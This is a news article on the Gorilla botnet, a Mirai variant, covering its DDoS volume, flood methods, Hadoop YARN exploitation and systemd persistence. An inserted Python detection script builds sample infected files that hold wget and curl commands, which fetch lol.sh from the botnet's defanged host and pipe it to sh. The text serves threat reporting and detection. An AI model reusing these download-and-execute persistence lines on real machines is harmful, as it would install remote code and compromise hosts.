
    New Gorilla Botnet Unleashes Over 300,000 DDoS Attacks Spanning 100 Countries

    A newly identified malware family, dubbed Gorilla (or GorillaBot), has emerged as a significant threat in the cybersecurity landscape. This botnet, a variant derived from the infamous leaked Mirai source code, has recently been uncovered by researchers.

    NSFOCUS, a cybersecurity firm responsible for detecting this malicious activity last month, disclosed that the botnet had issued an alarming 300,000+ attack commands from September 4 to September 27, 2024, with an unprecedented frequency of assaults. On average, at least 20,000 distributed denial-of-service (DDoS) commands were deployed daily.

    The attacks have wreaked havoc across more than 100 nations, targeting a wide range of sectors, including universities, government portals, telecommunications, financial institutions, and online gaming and gambling platforms. Notably, China, the U.S., Canada, and Germany emerged as the primary victims of these aggressive cyber offensives.

    According to NSFOCUS, Gorilla employs a variety of sophisticated DDoS techniques, such as UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. Because UDP is connectionless, the botnet can forge the source IP addresses of its flood traffic, generating overwhelming volumes that are difficult to filter at the target.

    Moreover, Gorilla is compatible with various CPU architectures, including ARM, MIPS, x86_64, and x86, enhancing its adaptability. The botnet connects to one of its five predefined command-and-control (C2) servers to receive instructions and execute further DDoS attacks.

    In a notable escalation, the malware includes features allowing it to exploit a vulnerability in Apache Hadoop YARN RPC, facilitating remote code execution. This flaw has been actively abused since at least 2021, according to reports from Alibaba Cloud and Trend Micro.

    Once entrenched within a system, the botnet ensures its persistence by installing a service file named custom.service within the “/etc/systemd/system/” directory. This service is configured to launch automatically with each system startup, effectively embedding the malware. Additionally, the service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar commands are implanted in other files like “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd,” ensuring that the script is executed whenever the system reboots or the user logs in.
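The persistence locations named above (the custom.service unit, the lol.sh dropper, the pen.gorillafirewall[.]su host, and the seeded /etc/inittab, /etc/profile and /boot/bootcmd files) are exactly what a defender would sweep a fleet for. The following host-hunting script is an added example written for this article; it is not NSFOCUS's tooling or code from the report. The function names (scan_persistence, scan_file, build_sample_root) are assumptions, and the infected-host tree it builds is constructed inline so the script runs offline. Point scan_persistence at "/" on a live host; the indicator patterns are substrings, so they match both the defanged and the plain form of the domain.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the NSFOCUS findings summarized in the article.
# Substring patterns so a defanged "pen.gorillafirewall[.]su" also matches.
INDICATORS = {
    "lol_sh_dropper": re.compile(r"\blol\.sh\b"),
    "c2_domain": re.compile(r"gorillafirewall"),
}

# Unit name and startup files the article names as persistence locations.
SUSPECT_UNIT = "custom.service"
UNIT_DIR = "etc/systemd/system"
STARTUP_FILES = ["etc/inittab", "etc/profile", "boot/bootcmd"]


def scan_file(path: Path, root: Path) -> list[dict]:
    """Return one finding per indicator hit per line of a single file."""
    findings = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append({
                    "file": "/" + path.relative_to(root).as_posix(),
                    "line": lineno,
                    "indicator": name,
                    "evidence": line.strip(),
                })
    return findings


def scan_persistence(root: str = "/") -> list[dict]:
    """Hunt for the Gorilla persistence artifacts below a filesystem root.

    root defaults to "/" for a live host; the demo points it at a constructed tree.
    """
    root_path = Path(root)
    findings = []

    # 1. The literal unit name reported by NSFOCUS, flagged regardless of content.
    if (root_path / UNIT_DIR / SUSPECT_UNIT).is_file():
        findings.append({"file": "/" + UNIT_DIR + "/" + SUSPECT_UNIT, "line": 0,
                         "indicator": "suspect_unit_name", "evidence": SUSPECT_UNIT})

    # 2. Any unit file that references the dropper script or the C2 host.
    unit_dir = root_path / UNIT_DIR
    if unit_dir.is_dir():
        for unit in sorted(unit_dir.glob("*.service")):
            findings.extend(scan_file(unit, root_path))

    # 3. The init, profile and boot files the malware also seeds.
    for rel in STARTUP_FILES:
        candidate = root_path / rel
        if candidate.is_file():
            findings.extend(scan_file(candidate, root_path))
    return findings


def build_sample_root() -> str:
    """Create a constructed, offline filesystem tree mimicking an infected host."""
    root = Path(tempfile.mkdtemp(prefix="gorilla-hunt-"))
    (root / UNIT_DIR).mkdir(parents=True)
    (root / "boot").mkdir()
    # Constructed unit modelled on the behaviour the article describes
    # (download and run lol.sh from the article's defanged domain).
    (root / UNIT_DIR / SUSPECT_UNIT).write_text(
        "[Unit]\nDescription=custom\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -qO- http://pen.gorillafirewall[.]su/lol.sh | sh'\n"
        "Restart=always\n\n[Install]\nWantedBy=multi-user.target\n")
    # A benign unit that must not be flagged.
    (root / UNIT_DIR / "backup.service").write_text(
        "[Unit]\nDescription=nightly backup\n[Service]\nExecStart=/usr/local/bin/backup.sh\n")
    # /etc/profile seeded with the same command; inittab and bootcmd left clean.
    (root / "etc" / "profile").write_text(
        "export PATH=/usr/bin:/bin\n"
        "/bin/sh -c 'curl -s http://pen.gorillafirewall[.]su/lol.sh | sh'\n")
    (root / "etc" / "inittab").write_text("id:3:initdefault:\n")
    (root / "boot" / "bootcmd").write_text("run bootcmd_mmc0\n")
    return str(root)


if __name__ == "__main__":
    for hit in scan_persistence(build_sample_root()):
        print(f"{hit['file']}:{hit['line']} {hit['indicator']} -> {hit['evidence']}")
```

On the constructed tree the scan reports the suspect unit name, two indicator hits on the unit's ExecStart line, and two on the seeded /etc/profile line, while the benign backup.service and the clean inittab and bootcmd stay silent. On a real host, treat a hit on any of these paths as a trigger to pull the unit file and the referenced script for analysis rather than simply deleting them, since the article notes the same command is planted in several locations.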

    NSFOCUS emphasized that Gorilla employs encryption algorithms commonly associated with the Keksec group to obscure vital information, all while utilizing advanced counter-detection measures to sustain its long-term control over compromised IoT devices and cloud infrastructure. This makes it a formidable new player in the botnet landscape, with a marked ability to evade detection and execute large-scale DDoS campaigns.
